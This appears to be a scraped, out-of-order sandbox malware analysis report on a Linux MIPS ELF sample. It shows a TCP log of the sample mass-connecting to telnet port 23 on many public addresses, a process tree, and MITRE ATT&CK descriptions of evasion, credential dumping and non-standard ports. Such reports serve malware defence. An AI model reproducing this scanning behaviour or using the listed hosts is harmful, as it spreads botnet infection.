Dec 15, 2024 00:46:56.444536924 CET	51384	23	192.168.2.13	220.98.46.164
Dec 15, 2024 00:46:56.451045036 CET	44998	23	192.168.2.13	40.38.255.26
Dec 15, 2024 00:46:56.451704979 CET	46838	23	192.168.2.13	54.234.185.176
Dec 15, 2024 00:46:56.471127033 CET	49474	23	192.168.2.13	202.212.151.129
Dec 15, 2024 00:46:56.489123106 CET	49220	23	192.168.2.13	149.77.79.191
Dec 15, 2024 00:46:56.494843960 CET	43224	23	192.168.2.13	20.56.43.86
Dec 15, 2024 00:46:56.495440006 CET	23	33858	43.191.190.218	192.168.2.13
Dec 15, 2024 00:46:56.495609999 CET	33858	23	192.168.2.13	43.191.190.218
Dec 15, 2024 00:46:56.498402119 CET	48328	23	192.168.2.13	113.193.247.58
Dec 15, 2024 00:46:56.499214888 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 15, 2024 00:46:56.499283075 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 15, 2024 00:46:56.499862909 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 15, 2024 00:46:56.500261068 CET	40304	199	192.168.2.13	154.216.19.139
Dec 15, 2024 00:46:56.504523993 CET	43606	23	192.168.2.13	66.85.85.13
Dec 15, 2024 00:46:56.507728100 CET	38444	23	192.168.2.13	89.110.32.213
Dec 15, 2024 00:46:56.511642933 CET	23	58018	70.6.24.70	192.168.2.13
Dec 15, 2024 00:46:56.511718035 CET	58018	23	192.168.2.13	70.6.24.70
Dec 15, 2024 00:46:56.512335062 CET	45858	23	192.168.2.13	210.167.147.23
Dec 15, 2024 00:46:56.515908957 CET	34880	23	192.168.2.13	137.115.32.84
Dec 15, 2024 00:46:56.522867918 CET	33580	23	192.168.2.13	84.47.121.178
Dec 15, 2024 00:46:56.529093981 CET	49996	23	192.168.2.13	141.103.169.75
Dec 15, 2024 00:46:56.537424088 CET	38546	23	192.168.2.13	116.48.251.124
Dec 15, 2024 00:46:56.540592909 CET	39158	23	192.168.2.13	134.190.47.75
Dec 15, 2024 00:46:56.541666985 CET	23	43514	150.2.161.109	192.168.2.13
Dec 15, 2024 00:46:56.541845083 CET	43514	23	192.168.2.13	150.2.161.109
Dec 15, 2024 00:46:56.543951988 CET	51120	23	192.168.2.13	202.88.155.174
Dec 15, 2024 00:46:56.545905113 CET	54724	23	192.168.2.13	215.235.57.72
Dec 15, 2024 00:46:56.546554089 CET	33680	23	192.168.2.13	5.195.59.199
Dec 15, 2024 00:46:56.548259974 CET	40382	23	192.168.2.13	176.79.210.151
Dec 15, 2024 00:46:56.551348925 CET	50928	23	192.168.2.13	106.98.196.224
Dec 15, 2024 00:46:56.553885937 CET	60436	23	192.168.2.13	83.113.203.187
Dec 15, 2024 00:46:56.556171894 CET	50140	23	192.168.2.13	200.202.226.236
Dec 15, 2024 00:46:56.558146954 CET	50588	23	192.168.2.13	188.159.120.89
Dec 15, 2024 00:46:56.558270931 CET	23	35288	213.134.46.100	192.168.2.13
Dec 15, 2024 00:46:56.558348894 CET	35288	23	192.168.2.13	213.134.46.100
Dec 15, 2024 00:46:56.559945107 CET	43754	23	192.168.2.13	41.220.81.134
Dec 15, 2024 00:46:56.561856031 CET	49392	23	192.168.2.13	163.143.162.106
Dec 15, 2024 00:46:56.563672066 CET	57952	23	192.168.2.13	162.212.150.201
Dec 15, 2024 00:46:56.564445972 CET	23	51384	220.98.46.164	192.168.2.13
Dec 15, 2024 00:46:56.564498901 CET	51384	23	192.168.2.13	220.98.46.164
Dec 15, 2024 00:46:56.565814972 CET	53484	23	192.168.2.13	129.115.113.57
Dec 15, 2024 00:46:56.567646027 CET	53112	23	192.168.2.13	106.155.151.56
Dec 15, 2024 00:46:56.569703102 CET	36380	23	192.168.2.13	181.190.62.70
Dec 15, 2024 00:46:56.571090937 CET	23	44998	40.38.255.26	192.168.2.13
Dec 15, 2024 00:46:56.571263075 CET	44998	23	192.168.2.13	40.38.255.26
Dec 15, 2024 00:46:56.571713924 CET	23	46838	54.234.185.176	192.168.2.13
Dec 15, 2024 00:46:56.571804047 CET	34956	23	192.168.2.13	20.181.7.34
Dec 15, 2024 00:46:56.571885109 CET	46838	23	192.168.2.13	54.234.185.176
Dec 15, 2024 00:46:56.573863983 CET	53910	23	192.168.2.13	161.183.124.108
Dec 15, 2024 00:46:56.575937986 CET	36592	23	192.168.2.13	213.45.210.72
Dec 15, 2024 00:46:56.578321934 CET	39628	23	192.168.2.13	222.90.52.105
Dec 15, 2024 00:46:56.579853058 CET	59846	23	192.168.2.13	68.232.115.198
Dec 15, 2024 00:46:56.581639051 CET	36714	23	192.168.2.13	173.130.0.166
Dec 15, 2024 00:46:56.583386898 CET	42746	23	192.168.2.13	172.198.43.25
Dec 15, 2024 00:46:56.584907055 CET	45464	23	192.168.2.13	56.13.103.60
Dec 15, 2024 00:46:56.586565971 CET	46918	23	192.168.2.13	97.153.125.245
Dec 15, 2024 00:46:56.588568926 CET	33618	23	192.168.2.13	156.226.204.106
Dec 15, 2024 00:46:56.590163946 CET	44254	23	192.168.2.13	205.75.66.48
Dec 15, 2024 00:46:56.591078043 CET	23	49474	202.212.151.129	192.168.2.13
Dec 15, 2024 00:46:56.591172934 CET	49474	23	192.168.2.13	202.212.151.129
Dec 15, 2024 00:46:56.591696024 CET	52036	23	192.168.2.13	175.149.49.16
Dec 15, 2024 00:46:56.593357086 CET	44708	23	192.168.2.13	216.44.218.0
Dec 15, 2024 00:46:56.595005035 CET	33210	23	192.168.2.13	30.45.197.124
Dec 15, 2024 00:46:56.596735954 CET	53070	23	192.168.2.13	209.17.124.67
Dec 15, 2024 00:46:56.598412991 CET	56764	23	192.168.2.13	186.116.34.231
Dec 15, 2024 00:46:56.600191116 CET	34922	23	192.168.2.13	81.51.94.250
Dec 15, 2024 00:46:56.601907969 CET	39778	23	192.168.2.13	38.70.142.249
Dec 15, 2024 00:46:56.604029894 CET	51328	23	192.168.2.13	30.76.75.20
Dec 15, 2024 00:46:56.606267929 CET	51328	23	192.168.2.13	204.91.212.126
Dec 15, 2024 00:46:56.607978106 CET	48490	23	192.168.2.13	44.61.144.186
Dec 15, 2024 00:46:56.609139919 CET	23	49220	149.77.79.191	192.168.2.13
Dec 15, 2024 00:46:56.609319925 CET	49220	23	192.168.2.13	149.77.79.191
Dec 15, 2024 00:46:56.610299110 CET	44520	23	192.168.2.13	157.94.199.131
Dec 15, 2024 00:46:56.612406969 CET	33494	23	192.168.2.13	104.124.234.139
Dec 15, 2024 00:46:56.614346981 CET	34618	23	192.168.2.13	33.208.21.78
Dec 15, 2024 00:46:56.615247965 CET	23	43224	20.56.43.86	192.168.2.13
Dec 15, 2024 00:46:56.615349054 CET	43224	23	192.168.2.13	20.56.43.86
Dec 15, 2024 00:46:56.616539001 CET	45240	23	192.168.2.13	118.71.195.78
Dec 15, 2024 00:46:56.618797064 CET	50306	23	192.168.2.13	175.235.81.175
Dec 15, 2024 00:46:56.620091915 CET	23	48328	113.193.247.58	192.168.2.13
Dec 15, 2024 00:46:56.620148897 CET	48328	23	192.168.2.13	113.193.247.58
Dec 15, 2024 00:46:56.620949984 CET	49444	23	192.168.2.13	180.151.134.206
Dec 15, 2024 00:46:56.622961044 CET	37636	23	192.168.2.13	16.178.183.88
Dec 15, 2024 00:46:56.625658035 CET	36878	23	192.168.2.13	88.109.165.39
Dec 15, 2024 00:46:56.627854109 CET	59432	23	192.168.2.13	131.104.75.101
Dec 15, 2024 00:46:56.632386923 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 15, 2024 00:46:56.632433891 CET	199	40304	154.216.19.139	192.168.2.13
Dec 15, 2024 00:46:56.632463932 CET	23	43606	66.85.85.13	192.168.2.13
Dec 15, 2024 00:46:56.632488012 CET	40304	199	192.168.2.13	154.216.19.139
Dec 15, 2024 00:46:56.632509947 CET	43606	23	192.168.2.13	66.85.85.13
Dec 15, 2024 00:46:56.632527113 CET	23	38444	89.110.32.213	192.168.2.13
Dec 15, 2024 00:46:56.632577896 CET	38444	23	192.168.2.13	89.110.32.213
Dec 15, 2024 00:46:56.635329962 CET	40304	199	192.168.2.13	154.216.19.139
Dec 15, 2024 00:46:56.636946917 CET	40304	199	192.168.2.13	154.216.19.139
Dec 15, 2024 00:46:56.643593073 CET	40410	199	192.168.2.13	154.216.19.139

System Behavior

Analysis Process: mips.nn.elf PID: 5433, Parent PID: 5357

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	/tmp/mips.nn.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: mips.nn.elf PID: 5456, Parent PID: 5433

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: mips.nn.elf PID: 5459, Parent PID: 5456

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: mips.nn.elf PID: 5461, Parent PID: 5456

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: mips.nn.elf PID: 5470, Parent PID: 5456

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: udisksd PID: 5443, Parent PID: 802

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 5443, Parent PID: 802

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 5509, Parent PID: 802

General

Start time (UTC):	23:46:55
Start date (UTC):	14/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 5509, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 5532, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 5532, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 5533, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 5533, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: gnome-session-binary PID: 5534, Parent PID: 1588

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Analysis Process: sh PID: 5534, Parent PID: 1588

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gsd-housekeeping PID: 5534, Parent PID: 1588

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/libexec/gsd-housekeeping
Arguments:	/usr/libexec/gsd-housekeeping
File size:	51840 bytes
MD5 hash:	b55f3394a84976ddb92a2915e5d76914

Analysis Process: udisksd PID: 5538, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 5538, Parent PID: 802

General

Start time (UTC):	23:46:56
Start date (UTC):	14/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mips.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/motd

/tmp/qemu-open.zlEnOZ (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: mips.nn.elf PID: 5433, Parent PID: 5357

General

Analysis Process: mips.nn.elf PID: 5456, Parent PID: 5433

General

Analysis Process: mips.nn.elf PID: 5459, Parent PID: 5456

General

Analysis Process: mips.nn.elf PID: 5461, Parent PID: 5456

General

Analysis Process: mips.nn.elf PID: 5470, Parent PID: 5456

General

Analysis Process: udisksd PID: 5443, Parent PID: 802

General

Analysis Process: dumpe2fs PID: 5443, Parent PID: 802

General

Analysis Process: udisksd PID: 5509, Parent PID: 802

General

Linux Analysis Report
mips.nn.elf